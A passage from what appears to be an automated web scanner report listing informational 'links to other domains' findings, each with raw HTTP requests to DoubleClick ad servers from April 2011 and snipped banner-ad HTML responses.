GET /adi/N3905.turn.com/B5269631.6;sz=160x600;ord=4362734341326432640?;click=http://r.turn.com/r/tpclick/id/gOkoyMSLizwQrQcA9wEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB1Ut5hU60TZm4EoX1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtzaFmwsDVNDneUP-J0S8ckVGnH7aw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680216&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662216231&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662216243&frm=1&adk=2614322350&ga_vid=1201236310.1303662216&ga_sid=1303662216&ga_hid=2010158345&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:23:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7710

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Sun Feb 20 13:37:59 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
MgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtzaFmwsDVNDneUP-J0S8ckVGnH7aw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/http%3a%2f%2fgorving.com/watch-video/default.aspx"><img src="http://s0.2mdn.net/2638209/3-160X600_20_grv_wv_def.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

23.19. http://ad.doubleclick.net/adi/N4270.158901.DATAXU/B5279302.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.158901.DATAXU/B5279302.4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N4270.158901.DATAXU/B5279302.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RES95J3Zo_918427505.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAHP6EK5X5HHeFjM058SIacGTDQNRf0Tg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZNQXp6YTk2dA&ciu=MFJFUzk1SjNabw&reqid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=866&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:30:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5662

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Apr 06 13:57:19 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
3Bh%3Dv8/3af3/3/0/%2a/d%3B239480762%3B0-0%3B0%3B60530085%3B2321-160/600%3B41519170/41536957/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.adobe.com/education/students/?sdid=IGKJB"><img src="http://s0.2mdn.net/1295336/Adobe_Students5-5_NewCS5-5_160x600_img.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

23.20. http://ad.doubleclick.net/adi/N4515.131803.TURN/B5378843.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4515.131803.TURN/B5378843.4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N4515.131803.TURN/B5378843.4;sz=160x600;ord=4368933343399774953?;click=http://r.turn.com/r/tpclick/id/6Qq0bLqRoTxeyAkACAIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBD-aSeUC0TavtIsTQlQeV8KSSA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtynzGyD5NOSB5w7sFpbILgCD5Jd-g%26client%3Dca-pub-6888065668292638%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676620&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658620545&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658620550&frm=1&adk=2614322350&ga_vid=1094438829.1303658621&ga_sid=1303658621&ga_hid=825275319&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=36813005&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:23:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7977

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Mar 31 00:25:09 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
6client%3Dca-pub-6888065668292638%26adurl%3D/url/http%3a%2f%2fwww.ballyfitness.com/get-started/bally-free-guest-pass/free-guest-pass.aspx%3FCID%3DD%3ACW%3ATurn%3A$0EFRedEnergized%3ANew7-dayGP%3AApr11"><img src="http://s0.2mdn.net/1474572/Bal_AprilBanners_160x600_110330.gif" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

23.21. http://ad.doubleclick.net/adi/N4637.158901.6939390485621/B5385253.8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4637.158901.6939390485621/B5385253.8

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N4637.158901.6939390485621/B5385253.8;sz=160x600;pc=[TPAS_ID];ord=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RilLTaqf1_958911823.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRU9gAKcZcK7GWLyoFKWsZOaIGHRR4fdymMmw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZTb3MxV1lvZQ&ciu=MFJpbExUYXFmMQ&reqid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=611&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:56:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5643

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Oct 15 18:11:35 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
50%3B2321-160/600%3B38841457/38859214/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.artinstitutes.edu/SERCH/Dynamic/Display.aspx?RIFID=1542&SOURCE=MOX13&CID=MOX13_AIWA_091_BA_002"><img src="http://s0.2mdn.net/1524146/160x600_AI_Graphic_Design_093010.gif" width="160" height="600" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

23.22. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7458
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:19:53 GMT
Expires: Sun, 24 Apr 2011 16:19:53 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Fri Apr 15 14:41:42 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
rpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=http%3a%2f%2fwww.newark.com/jsp/bespoke/bespoke7.jsp%3Fbespokepage%3Dcommon/en/technology-first/whats-new/whats-new.jsp%26CMP%3DBAN-L0-Discrete"><img src="http://s0.2mdn.net/2680163/e14_semiconductors_160x600.gif" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

23.23. http://ad.doubleclick.net/adi/N5315.158901.DATAXU/B5334493.10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.158901.DATAXU/B5334493.10

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N5315.158901.DATAXU/B5334493.10;sz=728x90;ord=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAIEK0K5YNMOLob9Z6R4rJH8FZ3KUYu1A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZGeVp3NFpBSg&ciu=MFJGRmNXcGFUTg&reqid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=503&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:30:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4248

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner
...[SNIP]...
<!-- Copyright 2009 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
/90%3B40481615/40499402/1%3B%3B%7Esscs%3D%3fhttp://www.dishnetwork.com/redirects/promotion/offer55/default.aspx?WT.mc_id=DDDXUO55FEB7289&KBID=1340&utm_source=dataxu&utm_medium=display&utm_campaign=bl"><img src="http://s0.2mdn.net/1831140/1-dn_charts_type2B_600_728x90_v02.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript>
<script type='text/javascript' language='javascript'
src='http://cdn.doubleverify.com/script66.js?agnc=564334&cmp=5334493&crt=40481615&dvtagver=3.3.1243.2031&adsrv=1&plc=61270887&advid=1831140&sid=1054404&adid=238218254'>
</script>
...[SNIP]...

23.24. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.13  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.13

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N553.158901.DATAXU/B4970757.13;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0R99JaasWk_1847829791.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAE_LoK5XuIHB0satALga2stUWRTt_29A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFI5OUphYXNXaw&reqid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:29:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5603

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
3/3/0/%2a/s%3B239296401%3B2-0%3B0%3B57848019%3B2321-160/600%3B41496532/41514319/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://personalsavings.americanexpress.com/savings-product.html"><img src="http://s0.2mdn.net/2179194/1-1-HYSA_RL_160x600_20k.jpg" width="160" height="600" border="0" alt="" galleryimg="no"></a></noscript>

<!-- start DV tag-->
<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=4970757&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=57848019&advid=2179194&sid=973580&adid='></script>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1153/pixel.gif?e=100&v=noscript"/></noscript>
...[SNIP]...

23.25. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.16

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N553.158901.DATAXU/B4970757.16;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEN8R0Zmd0tBcHhIeHwxMzAzNjU4NDkyOTk5fDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8NDIwNDQw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0REyoPRMSz_696710848.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEN8R0Zmd0tBcHhIeHwxMzAzNjU4NDkyOTk5fDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8NDIwNDQw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_-gAOCYEK5XdQI_RaDCZm9H-nfhLkah7veg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=420&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:26:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5552

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
f3/3/0/%2a/r%3B239296400%3B1-0%3B0%3B57848023%3B3454-728/90%3B41416573/41434360/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://personalsavings.americanexpress.com/savings-product.html"><img src="http://s0.2mdn.net/2179194/13-HYSA_RL_728x90_20k.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript>

<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=4970757&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=57848023&advid=2179194&sid=973580&adid='></script>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1153/pixel.gif?e=100&v=noscript"/></noscript>
...[SNIP]...

23.26. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.16

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

